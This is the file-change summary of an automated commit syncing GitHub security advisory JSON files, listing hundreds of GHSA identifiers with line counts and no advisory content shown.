From 3629ab10a3507fcc2758d85cc92e6021aba69ed9 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 10 Apr 2024 18:41:34 +0000 Subject: [PATCH] Advisory Database Sync --- .../GHSA-5964-pq8r-4q62.json | 11 +- .../GHSA-5xv2-q475-rwrh.json | 78 +++++++ .../GHSA-6mmf-v5q7-vw2w.json | 70 ++++++ .../GHSA-7pg4-5233-82jv.json | 17 +- .../GHSA-8q95-jj7p-x93x.json | 72 +++++- .../GHSA-9773-3fqg-8w25.json | 96 +++++++- .../GHSA-f889-wfwm-6p7m.json | 39 +++- .../GHSA-j6jq-3q8p-xgg6.json | 33 ++- .../GHSA-jr9m-v5qh-mh2j.json | 69 +++++- .../GHSA-pjqh-2jcc-5j84.json | 12 +- .../GHSA-x634-34m9-96mp.json | 76 ++++++- .../GHSA-xc7w-jvhx-p6q9.json | 58 ++++- .../GHSA-xh97-72ww-2w58.json | 9 +- .../GHSA-7pf9-7cff-f854.json | 37 ++- .../GHSA-9jjw-hf72-3mxw.json | 6 +- .../GHSA-894q-wpg5-mf2h.json | 12 +- .../GHSA-5cx2-vq3h-x52c.json | 6 +- .../GHSA-rggv-cv7r-mw98.json | 6 +- .../GHSA-7w75-32cg-r6g2.json | 6 +- .../GHSA-9mg4-v392-8j68.json | 42 +++- .../GHSA-f5x3-32g6-xq36.json | 21 +- .../GHSA-mh7p-8m2f-qrm6.json | 9 +- .../GHSA-pmf3-c36m-g5cf.json | 103 ++++++++- .../GHSA-v682-8vv8-vpwr.json | 6 +- .../GHSA-2p2x-p7wj-j5h2.json | 65 ++++++ .../GHSA-2v42-xp3j-47m4.json | 77 +++++++ .../GHSA-5297-wrrp-rcj7.json | 126 +++++++++++ .../GHSA-5gmm-6m36-r7jh.json | 66 ++++++ .../GHSA-5jx5-hqx5-2vrj.json | 70 ++++++ .../GHSA-6623-c6mr-6737.json | 69 ++++++ .../GHSA-67rv-qpw2-6qrr.json | 141 ++++++++++++ .../GHSA-747v-52c4-8vj8.json | 92 ++++++++ .../GHSA-9jh5-qf84-x6pr.json | 96 ++++++++ .../GHSA-cr6f-gf5w-vhrc.json | 69 ++++++ .../GHSA-frc2-w2cc-x794.json | 61 +++++ .../GHSA-g64r-xf39-q4p5.json | 69 ++++++ .../GHSA-ggp5-28x4-xcj9.json | 76 +++++++ .../GHSA-gv3w-m57p-3wc4.json | 73 ++++++ .../GHSA-hw42-3568-wj87.json | 69 ++++++ .../GHSA-j496-crgh-34mx.json | 210 ++++++++++++++++++ .../GHSA-j55w-hjpj-825g.json | 92 ++++++++ .../GHSA-m65c-wmw9-vmpp.json | 65 ++++++ .../GHSA-mc39-h54g-pvw6.json | 61 +++++ .../GHSA-p28x-hj68-7vfp.json | 65 ++++++ .../GHSA-prvg-rh5h-74jr.json | 61 +++++ .../GHSA-r4r6-j2j3-7pp5.json | 70 ++++++ .../GHSA-r956-2553-vvhr.json | 77 +++++++ .../GHSA-rhh4-rh7c-7r5v.json | 84 +++++++ .../GHSA-rr59-h6rh-v84v.json | 74 ++++++ .../GHSA-v24p-7p4j-qvvf.json | 92 ++++++++ .../GHSA-v4mm-q8fv-r2w5.json | 65 ++++++ .../GHSA-v6f3-gh5h-mqwx.json | 65 ++++++ .../GHSA-xg8v-m2mh-45m6.json | 65 ++++++ .../GHSA-23ff-j3f9-vw6f.json | 6 +- .../GHSA-26x8-wc99-6x99.json | 11 +- .../GHSA-3jhw-vwp2-45mp.json | 6 +- .../GHSA-53w9-wg73-ghrw.json | 11 +- .../GHSA-5xv2-q475-rwrh.json | 58 ----- .../GHSA-6mmf-v5q7-vw2w.json | 35 --- .../GHSA-hg8v-gh24-gpf4.json | 6 +- .../GHSA-jw3x-9g83-4hvr.json | 15 +- .../GHSA-wp9w-2vp9-wg66.json | 114 +++++----- .../GHSA-3mf9-jjrh-xqv8.json | 10 +- .../GHSA-9pw2-prwg-r2jf.json | 10 +- .../GHSA-h83r-hgff-qm4q.json | 6 +- .../GHSA-45qq-m2cx-4ggc.json | 6 +- .../GHSA-6wxp-8624-h2hh.json | 6 +- .../GHSA-hhfj-vm6r-5prv.json | 6 +- .../GHSA-jvmm-xwpf-wmm2.json | 6 +- .../GHSA-mh56-636p-hcp5.json | 6 +- .../GHSA-3pj2-53jv-g287.json | 6 +- .../GHSA-m758-wc7v-8xpg.json | 6 +- .../GHSA-qmrr-rfcw-67r3.json | 6 +- .../GHSA-229m-w66g-mjph.json | 6 +- .../GHSA-4rfc-h5jw-xx8j.json | 6 +- .../GHSA-9g9q-7j6v-8cmj.json | 6 +- .../GHSA-9gpg-73x5-68cm.json | 6 +- .../GHSA-cq5q-x34f-p7m4.json | 6 +- .../GHSA-mg88-vr9f-rg8p.json | 6 +- .../GHSA-mgjv-r82f-ph9q.json | 6 +- .../GHSA-w4qc-wgxq-8xrm.json | 6 +- .../GHSA-wwcw-2vrq-f4jg.json | 6 +- .../GHSA-2wg5-v4cg-mmvr.json | 6 +- .../GHSA-p9h2-45x3-q6pj.json | 6 +- .../GHSA-3929-x7hw-wqqf.json | 6 +- .../GHSA-7674-425x-p4qw.json | 6 +- .../GHSA-vv5h-96wr-c27f.json | 6 +- .../GHSA-wjp2-7h9f-2jxg.json | 6 +- .../GHSA-xwmv-cv85-273r.json | 6 +- .../GHSA-2548-xwx6-3r34.json | 6 +- .../GHSA-2c8h-6hfp-gpv6.json | 6 +- .../GHSA-2gjq-ggr9-9f3w.json | 6 +- .../GHSA-2jrw-2xf6-7qh4.json | 6 +- .../GHSA-342m-47g4-wcgj.json | 6 +- .../GHSA-34p4-vjw3-68hq.json | 6 +- .../GHSA-3cqp-gxcm-89f4.json | 6 +- .../GHSA-3g32-r9h6-fv6m.json | 6 +- .../GHSA-3j29-j9r5-2r42.json | 6 +- .../GHSA-3m75-6h9w-8hp6.json | 6 +- .../GHSA-3mqx-ggcf-qxwg.json | 6 +- .../GHSA-4rj9-gmxf-4rcf.json | 6 +- .../GHSA-4v9c-j8h8-rg86.json | 6 +- .../GHSA-5g3m-p64v-8cm3.json | 6 +- .../GHSA-5j2r-c4r4-2f9c.json | 6 +- .../GHSA-5x66-w85v-593v.json | 6 +- .../GHSA-5xjp-7w7g-522j.json | 6 +- .../GHSA-64mj-745w-r3p7.json | 6 +- .../GHSA-655f-j2cx-ww9q.json | 6 +- .../GHSA-66fm-27xg-wrx7.json | 6 +- .../GHSA-6m28-3r86-ccr3.json | 6 +- .../GHSA-6r73-mrfj-4ww6.json | 6 +- .../GHSA-7fr5-x4fw-q767.json | 6 +- .../GHSA-7xcw-qxc4-v8f9.json | 6 +- .../GHSA-89gm-h4q5-gp3r.json | 6 +- .../GHSA-8g39-682j-5v37.json | 6 +- .../GHSA-8gw5-cvgr-jgv5.json | 6 +- .../GHSA-8vjg-qcpg-mp3p.json | 6 +- .../GHSA-97xh-jvgw-7w42.json | 6 +- .../GHSA-c5ph-w6xf-q6r8.json | 6 +- .../GHSA-c93f-7m77-g46f.json | 6 +- .../GHSA-cc4r-723q-4m79.json | 6 +- .../GHSA-cc62-wjgc-635w.json | 6 +- .../GHSA-cf7q-84pj-gw7g.json | 6 +- .../GHSA-cggv-xvc5-x9mm.json | 6 +- .../GHSA-cjwc-h345-hghp.json | 6 +- .../GHSA-f5c7-4jcc-2vq6.json | 6 +- .../GHSA-f5jr-v79w-8298.json | 6 +- .../GHSA-f634-fjh7-4pvv.json | 6 +- .../GHSA-ffxf-wxjm-c2gq.json | 6 +- .../GHSA-fjfp-5xx8-cgr2.json | 6 +- .../GHSA-g454-m7r7-f68q.json | 6 +- .../GHSA-g5p5-24rg-6xfq.json | 6 +- .../GHSA-g698-8w35-cq5r.json | 6 +- .../GHSA-g9rv-78v8-8hq5.json | 6 +- .../GHSA-gc44-mvvx-cvhm.json | 6 +- .../GHSA-gcqr-v3j7-qf2p.json | 6 +- .../GHSA-gqwq-w99c-9rc2.json | 6 +- .../GHSA-gv7v-cr3p-w5q7.json | 6 +- .../GHSA-gx5r-5h4q-3h4f.json | 6 +- .../GHSA-h2f9-xfxp-2rvx.json | 6 +- .../GHSA-h2jx-f8c9-6v68.json | 6 +- .../GHSA-hj28-g29j-qvp6.json | 6 +- .../GHSA-hp86-fc6r-wg46.json | 6 +- .../GHSA-hrc8-fc9f-gh45.json | 6 +- .../GHSA-j44v-ghf8-cf8j.json | 6 +- .../GHSA-j68r-vcw2-6wm6.json | 6 +- .../GHSA-jh6m-g253-f37c.json | 6 +- .../GHSA-m93g-v4mv-3ggr.json | 6 +- .../GHSA-mcwj-fc2v-3xc2.json | 6 +- .../GHSA-mf7c-gj3r-c59v.json | 6 +- .../GHSA-mhrq-7p7f-w264.json | 6 +- .../GHSA-mpwp-23xv-7j3h.json | 6 +- .../GHSA-mxjm-rf6p-f3mh.json | 6 +- .../GHSA-p58m-jmcr-h3gh.json | 6 +- .../GHSA-pjpq-gg4j-5jg3.json | 6 +- .../GHSA-pxvc-5jrx-h52p.json | 6 +- .../GHSA-q4gv-76qv-qh34.json | 6 +- .../GHSA-q8wr-886h-q847.json | 6 +- .../GHSA-qf87-w7v3-9256.json | 6 +- .../GHSA-r287-6vw5-j92p.json | 6 +- .../GHSA-r9wf-mqxc-cfhw.json | 6 +- .../GHSA-rjfr-rgjj-mvh5.json | 6 +- .../GHSA-v3r4-2w85-9v4h.json | 6 +- .../GHSA-v74j-582j-7x9r.json | 6 +- .../GHSA-vcr2-xx88-49q8.json | 6 +- .../GHSA-vfvj-chxf-p8qg.json | 6 +- .../GHSA-w3h6-hxc2-v9v7.json | 6 +- .../GHSA-w634-c25w-x24v.json | 6 +- .../GHSA-wvgv-79m5-4g2m.json | 6 +- .../GHSA-wx5h-wrh7-xg39.json | 6 +- .../GHSA-x9j3-j6j9-8j5g.json | 6 +- .../GHSA-xg93-r7c4-27gc.json | 6 +- .../GHSA-xh7j-grp8-cc5p.json | 6 +- .../GHSA-xq8j-75w7-8q64.json | 6 +- .../GHSA-xxcm-q624-6hcv.json | 6 +- .../GHSA-33cc-g737-2r5g.json | 6 +- .../GHSA-365x-5gg7-66qg.json | 6 +- .../GHSA-79cc-r4hf-5pv4.json | 11 +- .../GHSA-8j25-5vwv-hm2f.json | 11 +- .../GHSA-8mhp-pmjg-f6cw.json | 9 +- .../GHSA-99vg-6g53-53wq.json | 11 +- .../GHSA-9fx9-j289-p7f2.json | 11 +- .../GHSA-9xc4-66pr-rw85.json | 11 +- .../GHSA-f93f-4q67-pcmr.json | 11 +- .../GHSA-fvr5-4qp7-xwjc.json | 9 +- .../GHSA-gh68-jm46-84rf.json | 6 +- .../GHSA-j3g9-72cw-7wcp.json | 11 +- .../GHSA-jpmx-v3pp-6rp5.json | 6 +- .../GHSA-p23g-c2fc-p76q.json | 9 +- .../GHSA-r4hf-7fhj-q7fq.json | 9 +- .../GHSA-v75j-9fr8-x3rq.json | 9 +- .../GHSA-wp68-xh4w-r326.json | 9 +- .../GHSA-3x6c-xfwc-qp7m.json | 6 +- .../GHSA-6cvp-282g-6jp8.json | 9 +- .../GHSA-6q5p-rp5c-wmph.json | 6 +- .../GHSA-77m3-8vw3-fw8w.json | 9 +- .../GHSA-79wp-fmwh-x929.json | 6 +- .../GHSA-836c-4296-hwvw.json | 11 +- .../GHSA-857w-h46r-9g9g.json | 6 +- .../GHSA-948m-5vcf-j8g5.json | 9 +- .../GHSA-fh7f-4794-fgr3.json | 9 +- .../GHSA-gj62-r5fm-pg3q.json | 6 +- .../GHSA-h64q-p2cr-jmw7.json | 9 +- .../GHSA-jg48-xvhq-mrmw.json | 9 +- .../GHSA-jprr-pf4r-gvp5.json | 9 +- .../GHSA-mqr3-mxfg-8rw7.json | 9 +- .../GHSA-mrx6-42xr-335p.json | 9 +- .../GHSA-ph5r-c8gc-xg6f.json | 6 +- .../GHSA-px7f-qj7m-m4v6.json | 6 +- .../GHSA-qw7q-x9r6-v6fr.json | 9 +- .../GHSA-r9x8-r5r4-mq7c.json | 9 +- .../GHSA-vpp6-9fcm-rv58.json | 6 +- .../GHSA-x66g-5578-7px9.json | 6 +- .../GHSA-x9pr-7qrq-58vq.json | 6 +- .../GHSA-xcwm-wrf2-369r.json | 9 +- .../GHSA-222x-r452-4688.json | 39 ++++ .../GHSA-225x-44w7-hh2f.json | 38 ++++ .../GHSA-23c8-jrp9-f2v5.json | 35 +++ .../GHSA-23gq-p5v8-4xh3.json | 42 ++++ .../GHSA-2726-6rmv-hf9g.json | 46 ++++ .../GHSA-27p7-7mgq-m3v8.json | 38 ++++ .../GHSA-28v2-9pc8-5rcq.json | 50 +++++ .../GHSA-293q-jm6v-g4pw.json | 42 ++++ .../GHSA-299c-jvhc-gxj8.json | 51 +++++ .../GHSA-29f2-7m5v-qfqv.json | 35 +++ .../GHSA-29wp-xqwp-4vqr.json | 38 ++++ .../GHSA-29x8-vr7f-rwm6.json | 38 ++++ .../GHSA-2f37-h53v-66vq.json | 42 ++++ .../GHSA-2frh-5wq5-r279.json | 39 ++++ .../GHSA-2gc3-gxvv-r87c.json | 39 ++++ .../GHSA-2gfj-2fgr-3hmh.json | 42 ++++ .../GHSA-2jc9-36w4-pmqw.json | 38 ++++ .../GHSA-2jr3-vfc4-xrm2.json | 38 ++++ .../GHSA-2p66-2g75-qw5g.json | 46 ++++ .../GHSA-2p97-c8vf-r4rf.json | 39 ++++ .../GHSA-2pg5-q29v-6rxq.json | 38 ++++ .../GHSA-2q57-cgm5-3xfx.json | 50 +++++ .../GHSA-2r5m-mx77-x6w5.json | 42 ++++ .../GHSA-2r7g-574g-5j65.json | 42 ++++ .../GHSA-2v7w-h3hv-34rp.json | 50 +++++ .../GHSA-2w3g-r4c9-2jp8.json | 38 ++++ .../GHSA-2w9x-58hj-96v8.json | 35 +++ .../GHSA-2x2m-2fw2-whqj.json | 46 ++++ .../GHSA-2x49-6qmf-g5cq.json | 38 ++++ .../GHSA-2xw4-7mq9-jfcm.json | 38 ++++ .../GHSA-324f-c4g7-9r7j.json | 50 +++++ .../GHSA-3256-mcj5-3pwf.json | 42 ++++ .../GHSA-328p-7mr3-3mxp.json | 35 +++ .../GHSA-32gp-xwx5-8mwj.json | 42 ++++ .../GHSA-32hx-73r8-7rv4.json | 42 ++++ .../GHSA-32qf-5pwg-7x24.json | 54 +++++ .../GHSA-33g4-2m49-x49h.json | 46 ++++ .../GHSA-33m3-hvgx-q2v6.json | 46 ++++ .../GHSA-33px-qmc3-m5x2.json | 42 ++++ .../GHSA-33wg-9hcm-96gg.json | 35 +++ .../GHSA-33x5-jqpp-33fv.json | 46 ++++ .../GHSA-34jp-w7ww-7cwj.json | 50 +++++ .../GHSA-354p-799c-vqvc.json | 42 ++++ .../GHSA-35gg-3hw5-mf59.json | 38 ++++ .../GHSA-3656-hc57-pfv2.json | 38 ++++ .../GHSA-368r-9597-529x.json | 38 ++++ .../GHSA-36p4-cjjg-rccj.json | 39 ++++ .../GHSA-3898-wjpq-fj5f.json | 35 +++ .../GHSA-38jr-26cr-gjff.json | 46 ++++ .../GHSA-39m6-4cjh-f5fx.json | 38 ++++ .../GHSA-3g3p-3q57-722m.json | 38 ++++ .../GHSA-3gj4-2qc3-888r.json | 38 ++++ .../GHSA-3gqg-23cf-wq46.json | 38 ++++ .../GHSA-3gw6-fj56-vc35.json | 38 ++++ .../GHSA-3j63-c5m3-j7wp.json | 38 ++++ .../GHSA-3j6m-r2w5-2j6r.json | 46 ++++ .../GHSA-3jgm-wf2v-2mpq.json | 46 ++++ .../GHSA-3mg8-g497-8859.json | 50 +++++ .../GHSA-3p58-r886-3jr6.json | 35 +++ .../GHSA-3pfm-489g-56g9.json | 42 ++++ .../GHSA-3pjh-4p3m-3gfm.json | 35 +++ .../GHSA-3q37-hvwq-f7ph.json | 42 ++++ .../GHSA-3q7m-cr8v-q45g.json | 38 ++++ .../GHSA-3q9p-q428-g22j.json | 35 +++ .../GHSA-3qr9-mgq6-hx96.json | 42 ++++ .../GHSA-3qrx-86c2-gf3c.json | 35 +++ .../GHSA-3vqr-5r5v-rhm8.json | 38 ++++ .../GHSA-3vvw-rvgw-fjmh.json | 38 ++++ .../GHSA-3w26-vfvh-2v33.json | 38 ++++ .../GHSA-3x3c-vqj6-m557.json | 35 +++ .../GHSA-3xp5-393r-g6q2.json | 42 ++++ .../GHSA-443p-64xr-9cq7.json | 50 +++++ .../GHSA-44j5-2jvm-f6f7.json | 42 ++++ .../GHSA-454g-4qqq-2j4g.json | 38 ++++ .../GHSA-459v-rpwc-w8fx.json | 35 +++ .../GHSA-4677-2pjx-h9q8.json | 38 ++++ .../GHSA-47mh-5593-5c2x.json | 42 ++++ .../GHSA-48g7-wj4v-xxp7.json | 50 +++++ .../GHSA-48pv-j3x3-cw7v.json | 38 ++++ .../GHSA-49j4-86m8-q2jw.json | 58 +++++ .../GHSA-49pj-m3ff-pg2m.json | 42 ++++ .../GHSA-4cpw-m35q-r38g.json | 42 ++++ .../GHSA-4crp-3vwf-rfq3.json | 35 +++ .../GHSA-4fhw-468x-g9rx.json | 42 ++++ .../GHSA-4fmc-4hwh-vpmr.json | 50 +++++ .../GHSA-4fv5-487x-c795.json | 38 ++++ .../GHSA-4g9f-cwqh-fq5v.json | 39 ++++ .../GHSA-4gg5-g9ph-ph8x.json | 42 ++++ .../GHSA-4gjr-9vhm-vxgx.json | 38 ++++ .../GHSA-4gm7-w93h-8x3c.json | 46 ++++ .../GHSA-4h4c-f8cp-chxw.json | 38 ++++ .../GHSA-4h68-4rgv-j269.json | 46 ++++ .../GHSA-4hg6-h83c-r2j6.json | 35 +++ .../GHSA-4jw4-4g69-7273.json | 39 ++++ .../GHSA-4m72-9w9j-m4wh.json | 50 +++++ .../GHSA-4mgq-4xh9-wr7m.json | 35 +++ .../GHSA-4mmh-h9hr-3pwj.json | 38 ++++ .../GHSA-4mv6-pc6v-wf68.json | 50 +++++ .../GHSA-4p8q-p8qc-486x.json | 46 ++++ .../GHSA-4pjw-6qq7-rmhr.json | 42 ++++ .../GHSA-4q6x-q9wv-7pxv.json | 38 ++++ .../GHSA-4r3x-98hq-f543.json | 38 ++++ .../GHSA-4r65-78q5-x99r.json | 50 +++++ .../GHSA-4rjg-8j2c-ccv6.json | 35 +++ .../GHSA-4v46-qwhw-4224.json | 38 ++++ .../GHSA-4v53-9g52-rm7v.json | 35 +++ .../GHSA-4vh4-c5mm-jqmw.json | 35 +++ .../GHSA-4w26-p3x4-j4mv.json | 35 +++ .../GHSA-4w89-wf2p-r2rr.json | 35 +++ .../GHSA-4wc6-f79m-2qgj.json | 42 ++++ .../GHSA-4wcf-973m-cwfg.json | 42 ++++ .../GHSA-4x8g-r685-hg4j.json | 42 ++++ .../GHSA-4x96-36w6-qf79.json | 42 ++++ .../GHSA-4xc2-wqm4-hxjx.json | 35 +++ .../GHSA-4xx7-g4qj-7pxm.json | 50 +++++ .../GHSA-52qx-x9h4-rv8r.json | 39 ++++ .../GHSA-53gv-p4jm-h5xv.json | 42 ++++ .../GHSA-53j3-7gcw-5jmc.json | 38 ++++ .../GHSA-53x2-fcg3-m32m.json | 2 +- .../GHSA-54gx-9g28-h45h.json | 38 ++++ .../GHSA-556c-jfj4-29vc.json | 42 ++++ .../GHSA-55w9-hrch-c3j9.json | 35 +++ .../GHSA-55x4-qvh8-76c6.json | 46 ++++ .../GHSA-5634-373h-23fw.json | 42 ++++ .../GHSA-564x-rr7c-f7qq.json | 38 ++++ .../GHSA-56vm-qxhc-5p2f.json | 39 ++++ .../GHSA-574q-w5vp-7fm6.json | 50 +++++ .../GHSA-5853-h8ff-m754.json | 42 ++++ .../GHSA-58mp-9hhc-gwv9.json | 35 +++ .../GHSA-59vf-hjxc-f9c5.json | 38 ++++ .../GHSA-5c83-88f2-q34h.json | 39 ++++ .../GHSA-5cfg-q9x8-w2j7.json | 50 +++++ .../GHSA-5g4m-3vpx-x6cw.json | 38 ++++ .../GHSA-5g4q-rxw6-4rmm.json | 38 ++++ .../GHSA-5gmw-5676-jhvh.json | 38 ++++ .../GHSA-5gv7-f38h-r3v2.json | 50 +++++ .../GHSA-5h96-vc53-5mqg.json | 38 ++++ .../GHSA-5hc2-c69v-grvx.json | 38 ++++ .../GHSA-5hf5-fh77-h2w2.json | 35 +++ .../GHSA-5hvp-4x73-f9p6.json | 38 ++++ .../GHSA-5mfc-7p58-rmq7.json | 38 ++++ .../GHSA-5mr4-7p75-327r.json | 42 ++++ .../GHSA-5p2g-jj66-wf2m.json | 38 ++++ .../GHSA-5p3v-8pvq-68mj.json | 38 ++++ .../GHSA-5pf6-gx59-rccf.json | 50 +++++ .../GHSA-5pfq-gm94-5f9g.json | 42 ++++ .../GHSA-5pm4-pf2x-jxw4.json | 38 ++++ .../GHSA-5q74-v533-4rqv.json | 35 +++ .../GHSA-5qq4-q34c-9875.json | 42 ++++ .../GHSA-5qvc-39c2-6m74.json | 42 ++++ .../GHSA-5v2g-8pw8-cqg5.json | 46 ++++ .../GHSA-5vxj-pv2g-wxwf.json | 50 +++++ .../GHSA-5w6f-4hgh-2xpc.json | 38 ++++ .../GHSA-5xph-5gr6-2w3x.json | 46 ++++ .../GHSA-6234-wr38-h5fr.json | 38 ++++ .../GHSA-629p-r69g-qfrc.json | 42 ++++ .../GHSA-62gj-gx39-jgj7.json | 35 +++ .../GHSA-62qp-h6pg-8q3g.json | 42 ++++ .../GHSA-64qx-rv33-fw3r.json | 43 ++++ .../GHSA-6564-xvqw-fc42.json | 38 ++++ .../GHSA-658g-8whg-f6jx.json | 42 ++++ .../GHSA-65q5-5rwq-hg89.json | 38 ++++ .../GHSA-665w-fpf3-c2hw.json | 46 ++++ .../GHSA-66j8-c83m-gj5f.json | 43 ++++ .../GHSA-674p-xmpw-wcmm.json | 38 ++++ .../GHSA-67xf-fx93-jxw5.json | 38 ++++ .../GHSA-68ww-8rpc-355h.json | 50 +++++ .../GHSA-696v-5v85-fv9m.json | 35 +++ .../GHSA-6c3g-5c2q-h98q.json | 35 +++ .../GHSA-6c4c-xwfh-gc7q.json | 35 +++ .../GHSA-6gj3-px4j-83rq.json | 38 ++++ .../GHSA-6gv8-hx3q-gqrw.json | 35 +++ .../GHSA-6hjh-xx5m-jf35.json | 38 ++++ .../GHSA-6hjj-7r3r-92p5.json | 39 ++++ .../GHSA-6m43-26j2-67g9.json | 50 +++++ .../GHSA-6m86-m75c-rj5c.json | 42 ++++ .../GHSA-6mr7-mqw3-p8r7.json | 38 ++++ .../GHSA-6mrw-fw7h-8g24.json | 35 +++ .../GHSA-6p2g-wx5c-v95j.json | 38 ++++ .../GHSA-6pfx-3rw7-5c4g.json | 35 +++ .../GHSA-6pxv-7652-xcm8.json | 38 ++++ .../GHSA-6q5m-66wv-m3p2.json | 38 ++++ .../GHSA-6q9x-mr9m-fh82.json | 35 +++ .../GHSA-6qcj-8j88-4gxg.json | 38 ++++ .../GHSA-6r33-7cp5-q454.json | 42 ++++ .../GHSA-6r8g-4hxg-92rf.json | 39 ++++ .../GHSA-6vjq-3xr5-4jh8.json | 38 ++++ .../GHSA-6w7h-hq54-gmmp.json | 50 +++++ .../GHSA-6w9f-jx26-wxpp.json | 50 +++++ .../GHSA-7245-x6gq-6qg5.json | 35 +++ .../GHSA-7389-qfwh-c32p.json | 50 +++++ .../GHSA-73j4-6xvf-jv3h.json | 38 ++++ .../GHSA-73p8-jp88-9jjm.json | 38 ++++ .../GHSA-73qm-xvq7-vqwg.json | 38 ++++ .../GHSA-74g7-xr56-998f.json | 42 ++++ .../GHSA-74g9-h4xg-q2rv.json | 50 +++++ .../GHSA-75cq-q7qc-2mc2.json | 35 +++ .../GHSA-75rf-98vv-mhm4.json | 50 +++++ .../GHSA-75xg-g2r2-475p.json | 42 ++++ .../GHSA-7678-c58q-5pw3.json | 38 ++++ .../GHSA-772r-9j2c-4jvf.json | 35 +++ .../GHSA-775c-ww7w-2c2j.json | 38 ++++ .../GHSA-77wg-f3wm-v858.json | 38 ++++ .../GHSA-786j-qm2f-r49g.json | 42 ++++ .../GHSA-78c9-fpph-r266.json | 35 +++ .../GHSA-78gp-j22r-4mpj.json | 42 ++++ .../GHSA-78rg-c3vx-jc43.json | 42 ++++ .../GHSA-78v4-x94j-xvq4.json | 38 ++++ .../GHSA-7f4v-g439-hqw9.json | 42 ++++ .../GHSA-7fjf-mf75-27gg.json | 38 ++++ .../GHSA-7fvp-vcpm-j9mq.json | 50 +++++ .../GHSA-7g9p-6w9q-wc84.json | 38 ++++ .../GHSA-7gvv-9m7c-r39r.json | 38 ++++ .../GHSA-7hpg-wrjj-gghq.json | 35 +++ .../GHSA-7jq6-7f95-hv67.json | 38 ++++ .../GHSA-7jxc-j2vf-9mcr.json | 39 ++++ .../GHSA-7m2v-r87h-vhc2.json | 38 ++++ .../GHSA-7p3m-6wwx-vgfx.json | 50 +++++ .../GHSA-7p73-h822-f5rv.json | 50 +++++ .../GHSA-7p7p-r9pc-pcmf.json | 42 ++++ .../GHSA-7pcc-7cq6-8v3x.json | 42 ++++ .../GHSA-7pwv-85gj-57j4.json | 50 +++++ .../GHSA-7q39-mffw-pf43.json | 35 +++ .../GHSA-7qfq-cp9v-rc33.json | 50 +++++ .../GHSA-7qgp-gf9r-8w4w.json | 38 ++++ .../GHSA-7r82-4m67-jq5c.json | 50 +++++ .../GHSA-7vfh-vh8v-495r.json | 38 ++++ .../GHSA-7xq6-jm62-ww8g.json | 6 +- .../GHSA-8266-hvc3-3w4r.json | 38 ++++ .../GHSA-8289-h44w-mrcv.json | 42 ++++ .../GHSA-82x8-6g4h-h5w3.json | 42 ++++ .../GHSA-8369-88r2-v5v6.json | 42 ++++ .../GHSA-84wm-vc86-65hw.json | 50 +++++ .../GHSA-85f3-pf99-4rpm.json | 35 +++ .../GHSA-85jh-9232-5897.json | 42 ++++ .../GHSA-85ww-p22g-3xvc.json | 50 +++++ .../GHSA-8673-r45m-47g8.json | 46 ++++ .../GHSA-86jx-wr74-xr74.json | 39 ++++ .../GHSA-86p8-qv4v-vv9r.json | 38 ++++ .../GHSA-86r8-h4wj-hhjg.json | 42 ++++ .../GHSA-8727-cvxh-wg93.json | 42 ++++ .../GHSA-876p-p3c7-ggc7.json | 43 ++++ .../GHSA-87f6-4648-854h.json | 35 +++ .../GHSA-87q7-rp2h-q5xw.json | 42 ++++ .../GHSA-87x6-8m9v-g8c2.json | 39 ++++ .../GHSA-8836-xpm5-3j5w.json | 50 +++++ .../GHSA-88wh-w28v-xrhh.json | 46 ++++ .../GHSA-899x-gqmc-4hgm.json | 38 ++++ .../GHSA-89fv-9763-xj44.json | 42 ++++ .../GHSA-89hm-2q6m-373c.json | 42 ++++ .../GHSA-89j9-gpmp-c355.json | 38 ++++ .../GHSA-8cc2-fr9v-6c2x.json | 38 ++++ .../GHSA-8g65-2hpp-8gjf.json | 35 +++ .../GHSA-8g7p-mx5x-8frc.json | 38 ++++ .../GHSA-8g89-49x9-pqr8.json | 38 ++++ .../GHSA-8gfv-66rm-fqmg.json | 38 ++++ .../GHSA-8gq2-wxqv-qc6m.json | 35 +++ .../GHSA-8h65-qg72-4ffh.json | 42 ++++ .../GHSA-8jhg-88f8-qqj6.json | 50 +++++ .../GHSA-8m6g-88w4-cv35.json | 35 +++ .../GHSA-8mpq-46gw-jqf3.json | 50 +++++ .../GHSA-8p73-58c5-5784.json | 35 +++ .../GHSA-8ppm-mwhc-2h38.json | 38 ++++ .../GHSA-8prr-f8pg-7r49.json | 35 +++ .../GHSA-8q39-5ffw-53hw.json | 35 +++ .../GHSA-8qhf-fjfw-g5r8.json | 38 ++++ .../GHSA-8qwf-p858-gvg4.json | 35 +++ .../GHSA-8r74-7v79-2c2q.json | 42 ++++ .../GHSA-8vf8-r7rr-h923.json | 38 ++++ .../GHSA-8vgx-r4c9-cvmm.json | 39 ++++ .../GHSA-8vjg-37gr-gvx7.json | 35 +++ .../GHSA-8wpf-4vhf-jhmg.json | 42 ++++ .../GHSA-9265-rqwh-6m4g.json | 42 ++++ .../GHSA-92jm-8w24-5mvr.json | 42 ++++ .../GHSA-92rg-x2hq-jc97.json | 50 +++++ .../GHSA-93gm-4q6q-xv6c.json | 54 +++++ .../GHSA-93p2-rq72-j8qp.json | 38 ++++ .../GHSA-93p8-27wh-j7p2.json | 38 ++++ .../GHSA-94vj-jcph-6x92.json | 35 +++ .../GHSA-9669-pjx9-x524.json | 38 ++++ .../GHSA-966w-ff57-5w3f.json | 50 +++++ .../GHSA-9726-4j22-xm36.json | 42 ++++ .../GHSA-975v-wj6r-fgj8.json | 42 ++++ .../GHSA-97xg-px2h-jvxp.json | 6 +- .../GHSA-9954-8wq3-xgxf.json | 42 ++++ .../GHSA-9c5h-gfrp-34v7.json | 42 ++++ .../GHSA-9h5q-wqw4-5xm2.json | 50 +++++ .../GHSA-9h9f-x9hq-6x6p.json | 38 ++++ .../GHSA-9j6h-484m-x3f5.json | 38 ++++ .../GHSA-9jc6-4356-gcv5.json | 42 ++++ .../GHSA-9p2q-32cq-fp5c.json | 50 +++++ .../GHSA-9pw9-3858-mcgc.json | 38 ++++ .../GHSA-9q4r-mjjh-mj2c.json | 38 ++++ .../GHSA-9qp6-g335-w8ph.json | 35 +++ .../GHSA-9qx9-xj3x-vh99.json | 38 ++++ .../GHSA-9r3q-3rc4-46v4.json | 50 +++++ .../GHSA-9rh9-6hgf-65f4.json | 38 ++++ .../GHSA-9rx6-wx6f-qfrg.json | 50 +++++ .../GHSA-9x76-66cx-ppf5.json | 38 ++++ .../GHSA-9xr8-gjj4-777r.json | 38 ++++ .../GHSA-c274-3m34-wwp8.json | 38 ++++ .../GHSA-c27x-344g-xx8m.json | 35 +++ .../GHSA-c2p9-p97g-7246.json | 